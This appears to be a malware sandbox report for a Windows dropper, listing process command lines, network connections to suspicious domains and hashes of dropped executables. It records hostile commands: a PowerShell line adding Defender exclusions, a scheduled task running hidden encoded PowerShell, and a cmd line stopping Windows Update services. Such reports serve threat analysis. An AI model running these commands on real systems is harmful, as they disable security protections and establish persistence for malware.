"C:\Users\Admin\Pictures\XLgvMgJGOgxCvrgsjoSqFfWx.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3892 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231006140636" --session-guid=0d437dcc-e127-4ed3-aff6-75a471467e8b --server-tracking-blob=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 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=0C05000000000000

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" helpmsg 29

C:\Users\Admin\Pictures\gWmNUi5KAnInwLJ0jNfwJOON.exe

"C:\Users\Admin\Pictures\gWmNUi5KAnInwLJ0jNfwJOON.exe"

C:\Users\Admin\Pictures\XLgvMgJGOgxCvrgsjoSqFfWx.exe

C:\Users\Admin\Pictures\XLgvMgJGOgxCvrgsjoSqFfWx.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2c0,0x2f0,0x6fa88538,0x6fa88548,0x6fa88554

C:\Users\Admin\AppData\Local\Temp\is-CJSU9.tmp\BvlSEw2eUWZ36nk3wRWQ7HZw.tmp

"C:\Users\Admin\AppData\Local\Temp\is-CJSU9.tmp\BvlSEw2eUWZ36nk3wRWQ7HZw.tmp" /SL5="$B0064,5025136,832512,C:\Users\Admin\Pictures\BvlSEw2eUWZ36nk3wRWQ7HZw.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /PID=5333

C:\Users\Admin\Pictures\XLgvMgJGOgxCvrgsjoSqFfWx.exe

"C:\Users\Admin\Pictures\XLgvMgJGOgxCvrgsjoSqFfWx.exe" --silent --allusers=0

C:\Users\Admin\Pictures\BvlSEw2eUWZ36nk3wRWQ7HZw.exe

"C:\Users\Admin\Pictures\BvlSEw2eUWZ36nk3wRWQ7HZw.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /PID=5333

C:\Users\Admin\Pictures\HFAbana3CGb6NBB6jb0QFoFg.exe

"C:\Users\Admin\Pictures\HFAbana3CGb6NBB6jb0QFoFg.exe"

C:\Users\Admin\Pictures\gGJrfkcvNpg9HV2A9dPXPCYP.exe

"C:\Users\Admin\Pictures\gGJrfkcvNpg9HV2A9dPXPCYP.exe"

C:\Users\Admin\Pictures\Y6OpfsDD1gnwJx7HuXkn4hOI.exe

"C:\Users\Admin\Pictures\Y6OpfsDD1gnwJx7HuXkn4hOI.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gbXIrIWRB" /SC once /ST 02:34:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gbXIrIWRB"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310061406361\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310061406361\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe"

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310061406361\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310061406361\assistant\assistant_installer.exe" --version

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

Network

Country Destination Domain Proto
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
US 104.20.67.143:443 pastebin.com tcp
DE 148.251.234.93:443 yip.su tcp
US 8.8.8.8:53 d062.userscloud.net udp
DE 168.119.140.62:443 d062.userscloud.net tcp
US 8.8.8.8:53 flyawayaero.net udp
US 8.8.8.8:53 downloads.digitalpulsedata.com udp
US 8.8.8.8:53 update.wf udp
US 8.8.8.8:53 ji.fhauiehgha.com udp
US 8.8.8.8:53 drivelikea.com udp
US 172.67.216.81:443 flyawayaero.net tcp
US 8.8.8.8:53 hbn42414.beget.tech udp
US 8.8.8.8:53 lancetjournal.com udp
US 8.8.8.8:53 lycheepanel.info udp
US 8.8.8.8:53 goboh2b.top udp
US 8.8.8.8:53 galandskiyher4.com udp
US 8.8.8.8:53 net.geo.opera.com udp
NL 13.227.219.25:443 downloads.digitalpulsedata.com tcp
US 8.8.8.8:53 grupoeca.co udp
US 188.114.96.0:443 lancetjournal.com tcp
RU 91.212.166.16:443 update.wf tcp
US 8.8.8.8:53 link.storjshare.io udp
US 85.217.144.143:80 85.217.144.143 tcp
US 104.21.32.208:443 lycheepanel.info tcp
US 188.114.96.0:443 lancetjournal.com tcp
US 136.0.77.2:443 link.storjshare.io tcp
NL 185.26.182.112:80 net.geo.opera.com tcp
US 8.8.8.8:53 potatogoose.com udp
NL 185.26.182.112:443 net.geo.opera.com tcp
RU 87.236.19.5:80 hbn42414.beget.tech tcp
US 172.67.180.173:443 potatogoose.com tcp
US 8.8.8.8:53 winterhunter.org udp
US 104.21.20.38:443 winterhunter.org tcp
NL 194.169.175.127:80 galandskiyher4.com tcp
US 72.29.85.225:443 grupoeca.co tcp
HK 103.100.211.218:80 ji.fhauiehgha.com tcp
US 8.8.8.8:53 143.67.20.104.in-addr.arpa udp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 8.8.8.8:53 62.140.119.168.in-addr.arpa udp
US 8.8.8.8:53 81.216.67.172.in-addr.arpa udp
US 8.8.8.8:53 25.219.227.13.in-addr.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 143.144.217.85.in-addr.arpa udp
US 8.8.8.8:53 208.32.21.104.in-addr.arpa udp
US 8.8.8.8:53 2.77.0.136.in-addr.arpa udp
US 8.8.8.8:53 112.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 16.166.212.91.in-addr.arpa udp
US 8.8.8.8:53 173.180.67.172.in-addr.arpa udp
US 8.8.8.8:53 5.19.236.87.in-addr.arpa udp
US 8.8.8.8:53 38.20.21.104.in-addr.arpa udp
US 8.8.8.8:53 127.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 225.85.29.72.in-addr.arpa udp
US 8.8.8.8:53 218.211.100.103.in-addr.arpa udp
US 8.8.8.8:53 z.nnnaajjjgc.com udp
MU 156.236.72.121:443 z.nnnaajjjgc.com tcp
US 8.8.8.8:53 121.72.236.156.in-addr.arpa udp
US 8.8.8.8:53 autoupdate.geo.opera.com udp
US 8.8.8.8:53 desktop-netinstaller-sub.osp.opera.software udp
NL 82.145.216.20:443 autoupdate.geo.opera.com tcp
NL 82.145.216.20:443 autoupdate.geo.opera.com tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 20.216.145.82.in-addr.arpa udp
US 8.8.8.8:53 121.217.145.82.in-addr.arpa udp
US 8.8.8.8:53 147.174.42.23.in-addr.arpa udp
US 8.8.8.8:53 m7val1dat0r.info udp
US 8.8.8.8:53 68.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 features.opera-api2.com udp
US 188.114.97.0:443 m7val1dat0r.info tcp
NL 82.145.216.16:443 features.opera-api2.com tcp
US 8.8.8.8:53 download.opera.com udp
NL 185.26.182.122:443 download.opera.com tcp
US 8.8.8.8:53 download3.operacdn.com udp
US 8.8.8.8:53 16.216.145.82.in-addr.arpa udp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
US 8.8.8.8:53 122.182.26.185.in-addr.arpa udp
GB 95.101.143.243:443 download3.operacdn.com tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 243.143.101.95.in-addr.arpa udp
US 8.8.8.8:53 app.nnnaajjjgc.com udp
US 8.8.8.8:53 9.57.101.20.in-addr.arpa udp
HK 154.221.26.108:80 app.nnnaajjjgc.com tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 bapp.digitalpulsedata.com udp
US 8.8.8.8:53 108.26.221.154.in-addr.arpa udp
CA 3.98.219.138:443 bapp.digitalpulsedata.com tcp
US 8.8.8.8:53 138.219.98.3.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
NL 94.142.138.131:80 94.142.138.131 tcp
US 8.8.8.8:53 api.myip.com udp
US 172.67.75.163:443 api.myip.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 131.138.142.94.in-addr.arpa udp
US 8.8.8.8:53 163.75.67.172.in-addr.arpa udp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 vk.com udp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
US 8.8.8.8:53 78.132.240.87.in-addr.arpa udp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:443 vk.com tcp
US 8.8.8.8:53 226.20.18.104.in-addr.arpa udp

Files

memory/4424-0-0x00000000003C0000-0x0000000000422000-memory.dmp

memory/4424-1-0x0000000074E30000-0x00000000755E0000-memory.dmp

memory/4424-2-0x0000000004ED0000-0x0000000004F6C000-memory.dmp

memory/4424-3-0x0000000005670000-0x0000000005C14000-memory.dmp

memory/4424-4-0x00000000051C0000-0x0000000005252000-memory.dmp

memory/4424-5-0x0000000004D40000-0x0000000004D50000-memory.dmp

memory/4424-6-0x0000000004DA0000-0x0000000004DAA000-memory.dmp

memory/4424-7-0x0000000005070000-0x00000000050BC000-memory.dmp

memory/4424-8-0x0000000005590000-0x00000000055AA000-memory.dmp

memory/2864-9-0x0000000000400000-0x0000000000408000-memory.dmp

memory/4612-10-0x0000000004ED0000-0x0000000004F06000-memory.dmp

memory/4612-12-0x0000000074E30000-0x00000000755E0000-memory.dmp

memory/4424-13-0x0000000074E30000-0x00000000755E0000-memory.dmp

memory/4612-14-0x0000000005540000-0x0000000005B68000-memory.dmp

memory/2864-15-0x0000000074E30000-0x00000000755E0000-memory.dmp

memory/4612-16-0x0000000002B30000-0x0000000002B40000-memory.dmp

memory/2864-17-0x00000000056D0000-0x00000000056E0000-memory.dmp

memory/4612-18-0x00000000054C0000-0x00000000054E2000-memory.dmp

memory/4612-19-0x0000000005D20000-0x0000000005D86000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_22ncwtn3.pwc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4612-25-0x0000000005E40000-0x0000000005EA6000-memory.dmp

memory/4612-30-0x0000000005EB0000-0x0000000006204000-memory.dmp

C:\Users\Admin\Pictures\EVKS9b1Iu6vXLGa4GRP60Loi.exe

MD5 24fe48030f7d3097d5882535b04c3fa8
SHA1 a689a999a5e62055bda8c21b1dbe92c119308def
SHA256 424a2551d356754c882d04ac16c63e6b50b80b159549d23231001f629455756e
SHA512 45a842447d5e9c10822f7d5db1192a0e8e7917e6546dab6aebe2542b5a82bedc26aa8d96e3e99de82e2d0b662fcac70d6914248371af034b763f5dd85dab0c51

memory/4612-42-0x00000000064A0000-0x00000000064BE000-memory.dmp

memory/4612-43-0x00000000064E0000-0x000000000652C000-memory.dmp

C:\Users\Admin\Pictures\gWmNUi5KAnInwLJ0jNfwJOON.exe

MD5 9d8d5955c120589d126c6f0ad26f2506
SHA1 521ca7d3977a9c99da92532722f66d7b09940e64
SHA256 c7c4172738b86422159a6c80931b45e7f788364be996a1f657ed3a570d429592
SHA512 0f173547f28d89b4a4cc76b2b553f27d3575ad3349728d889e28700d66aa4b2768e1721779428a5014eeab32de63e48595ccf56ed2c25fe79ed13dc43826f701

C:\Users\Admin\Pictures\gWmNUi5KAnInwLJ0jNfwJOON.exe

MD5 9d8d5955c120589d126c6f0ad26f2506
SHA1 521ca7d3977a9c99da92532722f66d7b09940e64
SHA256 c7c4172738b86422159a6c80931b45e7f788364be996a1f657ed3a570d429592
SHA512 0f173547f28d89b4a4cc76b2b553f27d3575ad3349728d889e28700d66aa4b2768e1721779428a5014eeab32de63e48595ccf56ed2c25fe79ed13dc43826f701

C:\Users\Admin\Pictures\gWmNUi5KAnInwLJ0jNfwJOON.exe

MD5 9d8d5955c120589d126c6f0ad26f2506
SHA1 521ca7d3977a9c99da92532722f66d7b09940e64
SHA256 c7c4172738b86422159a6c80931b45e7f788364be996a1f657ed3a570d429592
SHA512 0f173547f28d89b4a4cc76b2b553f27d3575ad3349728d889e28700d66aa4b2768e1721779428a5014eeab32de63e48595ccf56ed2c25fe79ed13dc43826f701

C:\Users\Admin\Pictures\pGyleBy48sPigxl6BDblZ9bY.exe

MD5 79612b891b45f9bcf1f5013f75d6eaa9
SHA1 228619fdd7966b13eac6644a6e90f4c97ad35475
SHA256 b35ebfe075a4ce5a92d18569189dcd404fc3e6a777599d43876ee8479fb665a9
SHA512 7058568ab483def06534db00e0eda1f11387676575cb69ae3f7847a1e45aad017efc96653686fe362eebae8e8676b1635b0e88108db608feaf7e0893856d8bfa

C:\Users\Admin\Pictures\HFAbana3CGb6NBB6jb0QFoFg.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Users\Admin\Pictures\gGJrfkcvNpg9HV2A9dPXPCYP.exe

MD5 601c7844cdbade71ea487a802b6c6d75
SHA1 921cb88ab70e76e798fed47404193a3f88464d88
SHA256 38a45e6148878dac4c9a72dc779d9d402b1816c6b71e4da314dbfcd533751d3c
SHA512 76a86ac724102ebfe4f1bf017e6627c40ce212f317ef699cf39ae83ab1f2e6fc69b49df36f388c8d9b6f4faa21b3cd81202fa1cbf89e842941c798b7bb3522c4

C:\Users\Admin\Pictures\nE9EqWiRmQP64KM8Kw99mB7B.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

C:\Users\Admin\Pictures\BvlSEw2eUWZ36nk3wRWQ7HZw.exe

MD5 fe469d9ce18f3bd33de41b8fd8701c4d
SHA1 99411eab81e0d7e8607e8fe0f715f635e541e52a
SHA256 b253f2cc3cafc35941d978a4d14b65610e641cb461e862fb0c155f3c30ce127a
SHA512 5b40c5259d01944e718bb14b8e6b994f2ea5bd391058aa8d086033cd609cb54231c7e07b4ab307ecfd5be28936e1c5576d3448504b99d9ac05c5442e5e1e85d9

C:\Users\Admin\Pictures\gGJrfkcvNpg9HV2A9dPXPCYP.exe

MD5 601c7844cdbade71ea487a802b6c6d75
SHA1 921cb88ab70e76e798fed47404193a3f88464d88
SHA256 38a45e6148878dac4c9a72dc779d9d402b1816c6b71e4da314dbfcd533751d3c
SHA512 76a86ac724102ebfe4f1bf017e6627c40ce212f317ef699cf39ae83ab1f2e6fc69b49df36f388c8d9b6f4faa21b3cd81202fa1cbf89e842941c798b7bb3522c4

C:\Users\Admin\Pictures\Y6OpfsDD1gnwJx7HuXkn4hOI.exe

MD5 2a11bdca15f3f99d319ef86ddc187bf7
SHA1 24ec21930bed314c15543a5df6ac05c09f919ef1
SHA256 f65464cc8178573d4318c18454658712bc4d922422c3d0d5fab43d2dfe16cd9e
SHA512 b6944388601fe1c234334a58bf2ba452a5e358f08daffab2af21d55df44df387da241ca672cfa265f8b2bafad29bdf943e1b2d65dafc082fb407550580a840b1

memory/4148-128-0x0000000000400000-0x0000000000413000-memory.dmp

memory/3496-134-0x0000000000400000-0x00000000004D8000-memory.dmp

C:\Users\Admin\Pictures\BvlSEw2eUWZ36nk3wRWQ7HZw.exe

MD5 fe469d9ce18f3bd33de41b8fd8701c4d
SHA1 99411eab81e0d7e8607e8fe0f715f635e541e52a
SHA256 b253f2cc3cafc35941d978a4d14b65610e641cb461e862fb0c155f3c30ce127a
SHA512 5b40c5259d01944e718bb14b8e6b994f2ea5bd391058aa8d086033cd609cb54231c7e07b4ab307ecfd5be28936e1c5576d3448504b99d9ac05c5442e5e1e85d9

memory/4148-136-0x0000000000400000-0x0000000000413000-memory.dmp

C:\Users\Admin\Pictures\BvlSEw2eUWZ36nk3wRWQ7HZw.exe

MD5 fe469d9ce18f3bd33de41b8fd8701c4d
SHA1 99411eab81e0d7e8607e8fe0f715f635e541e52a
SHA256 b253f2cc3cafc35941d978a4d14b65610e641cb461e862fb0c155f3c30ce127a
SHA512 5b40c5259d01944e718bb14b8e6b994f2ea5bd391058aa8d086033cd609cb54231c7e07b4ab307ecfd5be28936e1c5576d3448504b99d9ac05c5442e5e1e85d9
